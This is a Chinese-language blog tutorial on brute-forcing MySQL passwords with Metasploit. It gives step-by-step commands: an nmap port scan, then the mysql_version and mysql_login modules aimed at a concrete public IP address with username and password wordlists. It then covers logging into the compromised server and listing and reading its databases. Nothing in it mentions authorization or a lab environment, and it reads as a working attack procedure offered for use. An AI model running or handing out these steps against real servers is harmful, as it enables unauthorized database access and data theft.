当前位置:首页网络安全使用Metasploit暴力攻击MySQL

使用Metasploit暴力攻击MySQL

使用Metasploit暴力攻击MySQL

Metasploit是一个多功能工具,非常支持利用,因为在本文中,我将通过使用Metasploit在MySQL上执行暴力破解来分享有关数据库利用的技巧。但在继续之前,请确保您已在终端中安装了metasploit,如果您尚未安装metasploit https://www.metasploit.com,请在以下网址下载。

此外,在进行暴力破解MySQL之前,您还需要NMAP之类的信息收集工具来进行端口扫描,Nmap本身具有许多功能,而不仅仅是端口扫描。

首先,请打开nmap进行端口扫描,目标服务器上是否有mysql服务运行。

nmap website.com
使用Metasploit暴力攻击MySQL

在上图中,可以看到如果 mysql 端口是 3306,那么我们继续使用以下命令运行 metasploit。

sudo msfconsole
use mysql_version
set RHOSTS 103.78.73.108
run
使用Metasploit暴力攻击MySQL

然后,还将模块mysql_login设置为使用以下命令暴力破解目标mysql。

use mysql_login
set RHOSTS 103.78.73.108
set USERNAME root

在“用户名”部分中,您还可以使用已创建的用户名列表,或者输入用户名,例如在根或其他内容上方。如果要使用单词列表用户名,请使用以下命令进行设置。

set USER_FILE /<em>home/kali/userlist.txt</em>

将 /home/kali/userlist.txt 替换为用户列表的位置。

set PASS_FILE/home/kali/<em>passlist</em>.txt

将 /home/kali/passlist.txt 替换为密码列表的位置。

然后使用以下命令运行该模块。

run

等到metasploit完成它的工作,如果成功模块会自动停止并显示mysql用户名和密码。下面是结果的示例。

使用Metasploit暴力攻击MySQL

如果你现在得到了目标mysql的用户名和密码,我们只需要远程做远程mysql,但是如果你有mysql登录的东西,这部分就被跳过了。

telnet ip 3306
使用Metasploit暴力攻击MySQL
mysql -u username -h 103.78.73.108 -p

然后,如果MySQL远程成功,结果将如下图所示。

使用Metasploit暴力攻击MySQL

如果是这样,你只需要oprek数据库,或者如果你真的不知道mysql命令,我可以在下面帮助你一些基本的命令。

show databases;

此命令用于查看数据库名称

use namadatabase

输入数据库的命令

show tables;

用于查看 batabase 内的娜娜表

select from nama_columns;

用于查看数据库列的内容

温馨提示:

文章标题:使用Metasploit暴力攻击MySQL

文章链接:https://www.cutrui.cn/271.html

更新时间:2023年02月07日

声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。

给TA打赏
共{{data.count}}人
人已打赏
网络安全黑客工具

BurpSuite v2022.12.5汉化无cmd框版

2023-1-9 13:53:52

网络安全黑客技术

如何使用 nmap 检测漏洞

2023-1-13 12:58:29

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索

你有新的私信

请务必要查看您的私信哟~~